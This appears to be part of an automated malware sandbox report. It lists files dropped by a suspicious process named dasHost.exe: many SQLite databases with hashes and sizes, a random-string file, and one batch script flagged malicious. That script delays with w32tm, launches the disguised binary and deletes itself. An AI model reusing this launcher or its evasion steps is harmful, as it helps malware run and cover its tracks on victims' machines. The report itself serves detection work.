                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):25
                                                                        Entropy (8bit):4.243856189774724
                                                                        Encrypted:false
                                                                        SSDEEP:3:NsV9CGq:KV4Gq
                                                                        MD5:4B5238D0D9D06EF52EECEE54044A665A
                                                                        SHA1:E0B2321ED85E0D70C86B30785A40C82D2F58DA6C
                                                                        SHA-256:9EA9415B609BBFCA4B16CA500707648F85E25AB6B59E6AE5206018185824C0D4
                                                                        SHA-512:F1F6A42FAFCA79DC1A9C56AAD1A2A420307EE87F6723D8A5C6116F30EF9B8B1DD9E4C3ADA9E39452E7F69F1FA0C31C9AB756A4B3F3EF34A1DF8704AE19E01B4B
                                                                        Malicious:false
                                                                        Preview:0DXfqpHPSAXpyDMBgL6AsehTS
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Process:C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe
                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):240
                                                                        Entropy (8bit):5.178145391884472
                                                                        Encrypted:false
                                                                        SSDEEP:6:hCijTg3Nou1SV+DER5GKG+0dbKKOZG1wkn23fDoJX:HTg9uYDEfGj+OgfroF
                                                                        MD5:6EE3DCB6A90DBE90910BE8A3E218676F
                                                                        SHA1:A965C8CF6032D7F454BF3E84F1B50641EC50E66E
                                                                        SHA-256:144D8EACF6236F170EF5C1D07C0EC810F4A46D825BD2023193D469DFA9012D64
                                                                        SHA-512:9A218EA213879A6419E8C5DD113CFA7D40E19DBA34407A75770A451F18DBEB7B59F5F732F7959935647BB8F9C940D22C1D14E548C36EECEA8DCCECC5553B3EC8
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\common files\Microsoft Shared\dasHost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\6XMNLNVLzg.bat"
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
